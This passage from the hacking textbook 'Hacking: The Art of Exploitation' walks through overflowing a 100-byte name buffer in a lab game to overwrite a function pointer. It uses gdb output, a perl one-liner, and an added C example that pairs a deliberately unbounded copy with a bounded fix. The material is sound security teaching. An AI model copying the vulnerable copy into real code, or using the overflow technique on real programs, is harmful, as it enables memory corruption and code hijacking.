Hacking - The Art of Exploitation, 2nd Edition


158 0x300


7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[1]+ Stopped ./game_of_chance
reader@hacking:~/booksrc $

You can temporarily suspend the current process by pressing CTRL-Z. At
this point, the last_game variable has been set to 1, so the next time 1 is
selected, the function pointer will simply be called without being changed.
Back at the shell, we work out an appropriate overflow buffer, which can
be copied and pasted in as a name later. Recompiling the source with
debugging symbols and using GDB to run the program with a breakpoint
on main() allows us to explore the memory. As the output below shows, the
name buffer starts 100 bytes before the current_game pointer within the user
structure, so the 101st byte of a new name lands on the function pointer.

reader@hacking:~/booksrc $ gcc -g game_of_chance.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at game_of_chance.c:41
41 srand(time(0)); // Seed the randomizer with the current time.
(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>,
current_game = 0}
(gdb) x/x &player.name
0x804b66c <player+12>: 0x00000000
(gdb) x/x &player.current_game
0x804b6d0 <player+112>: 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running. Exit anyway? (y or n) y
reader@hacking:~/booksrc $

Using this information, we can generate a buffer that overflows the name
variable: 100 bytes of filler followed by the four bytes that will overwrite
current_game. This can be copied and pasted into the interactive Game of
Chance program when it is resumed. To return to the suspended process,
just type fg, which is short for foreground.

reader@hacking:~/booksrc $ perl -e 'print "A"x100. "BBBB". "\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg
./game_of_chance
5

Change user name
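The overflow described above, as an added C example that is not the book's game_of_chance.c: a struct with the same field layout as player (three ints, a 100-byte name, then the current_game function pointer, as the gdb output shows), the unbounded copy that lets a long name run into the pointer beside a bounded copy that cannot, and the 100-byte distance computed with offsetof instead of read from gdb. The game function pick_a_number, the two setter names and the victim wrapper are assumptions made for this example. The wrapper adds a few bytes of slack after the struct because the copy's terminating NUL lands one byte past current_game; in the book that byte lands in whatever global follows player.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Laid out like the book's player record: three ints, a 100-byte name,
 * then the current_game function pointer. Field names follow the gdb
 * output; the game function and setter names are assumptions. */
struct user {
    int uid;
    int credits;
    int highscore;
    char name[100];
    int (*current_game)(void);
};

static int pick_a_number(void) { return 1; }   /* stand-in game function */

/* Bytes from the start of name to current_game. gdb reported 100 on the
 * book's 32-bit build; offsetof gives 100 on 64-bit x86 too, because
 * 12 + 100 = 112 is already pointer-aligned, so no padding is inserted. */
size_t name_to_fp_offset(void) {
    return offsetof(struct user, current_game) - offsetof(struct user, name);
}

/* The vulnerable pattern: an unbounded copy into name (same behaviour as
 * strcpy, written out so a fortified libc cannot intercept it) runs
 * straight into current_game when the string is longer than the buffer. */
void set_name_unsafe(struct user *u, const char *newname) {
    char *d = u->name;
    while ((*d++ = *newname++) != '\0')
        ;   /* no bound: keeps writing past name[99] */
}

/* The fix: bound the copy by the destination size and always terminate. */
void set_name_safe(struct user *u, const char *newname) {
    strncpy(u->name, newname, sizeof(u->name) - 1);
    u->name[sizeof(u->name) - 1] = '\0';
}

/* Build the same buffer as the perl one-liner: name_to_fp_offset() bytes
 * of 'A' filler, then one 'B' per pointer byte so the value that lands on
 * current_game is recognizable (0x42424242 on a 32-bit build). */
size_t build_overflow(char *out, size_t outsz) {
    size_t off = name_to_fp_offset();
    size_t len = off + sizeof(void *);
    if (outsz < len + 1)
        return 0;
    memset(out, 'A', off);
    memset(out + off, 'B', sizeof(void *));
    out[len] = '\0';
    return len;
}

/* Read the pointer field back as an integer without a function-pointer cast. */
static uintptr_t fp_as_int(const struct user *u) {
    uintptr_t v;
    memcpy(&v, &u->current_game, sizeof v);
    return v;
}

/* Victim with slack after it: the copy's NUL terminator lands one byte past
 * current_game, which in the book hits the global that follows player. */
struct victim {
    struct user u;
    char slack[16];
};

/* Run one setter against the overflow buffer; return the resulting pointer. */
static uintptr_t fp_after(void (*setter)(struct user *, const char *)) {
    struct victim v;
    char buf[256];
    memset(&v, 0, sizeof v);
    v.u.current_game = pick_a_number;
    build_overflow(buf, sizeof buf);
    setter(&v.u, buf);
    return fp_as_int(&v.u);
}

/* 1 if the unbounded copy replaced current_game with the 'B' bytes. */
int unsafe_copy_overwrites_fp(void) {
    uintptr_t expect;
    memset(&expect, 'B', sizeof expect);
    return fp_after(set_name_unsafe) == expect;
}

/* 1 if the bounded copy left current_game pointing at pick_a_number. */
int safe_copy_preserves_fp(void) {
    struct user orig;
    memset(&orig, 0, sizeof orig);
    orig.current_game = pick_a_number;
    return fp_after(set_name_safe) == fp_as_int(&orig);
}

int main(void) {
    printf("name -> current_game offset: %zu bytes\n", name_to_fp_offset());
    printf("unbounded copy: current_game = 0x%lx\n",
           (unsigned long)fp_after(set_name_unsafe));
    printf("bounded copy:   current_game intact? %s\n",
           safe_copy_preserves_fp() ? "yes" : "no");
    return 0;
}
```

Running it prints the 100-byte offset and a current_game value made entirely of 0x42 bytes for the unbounded copy, which is the same corruption the book's "BBBB" name produces; the bounded setter leaves the pointer alone, which is why a length check on the destination is the fix rather than a longer buffer.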